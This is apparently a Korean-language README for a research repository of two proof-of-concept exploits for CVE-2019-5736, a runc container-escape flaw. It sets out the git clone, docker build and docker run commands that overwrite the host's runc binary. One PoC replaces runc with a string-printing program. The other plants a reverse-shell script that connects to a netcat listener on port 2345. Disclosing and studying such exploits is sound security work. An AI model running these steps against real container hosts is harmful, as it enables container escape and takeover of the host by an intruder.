
CVE-2019-5736 POCs
CVE-2019-5736용 PoC 두 개. CVE-2019-5736 및 PoC에 대한 설명은 Twistlock Labs를 참조하세요.
악성 이미지 PoC는 q3k의 PoC를 기반으로 제작되었으므로 모든 공로는 그에게 있습니다.
PoC를 실행하면 호스트의 runc 바이너리가 덮어써집니다. PoC 중 하나를 실행하기 전에 runc 바이너리(일반적으로 /usr/sbin/runc에 위치)의 복사본을 만들어 두는 것이 좋습니다.
저장소를 클론하세요:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
runc를 문자열을 출력하는 간단한 프로그램으로 덮어씁니다.
Exec PoC 실행:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
runc를 localhost:2345에 연결되는 간단한 리버스 셸 bash 스크립트로 덮어씁니다.
리버스 셸을 수신 대기:
$ nc -nvlp 2345
다른 셸에서 악성 이미지 PoC를 실행하세요:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC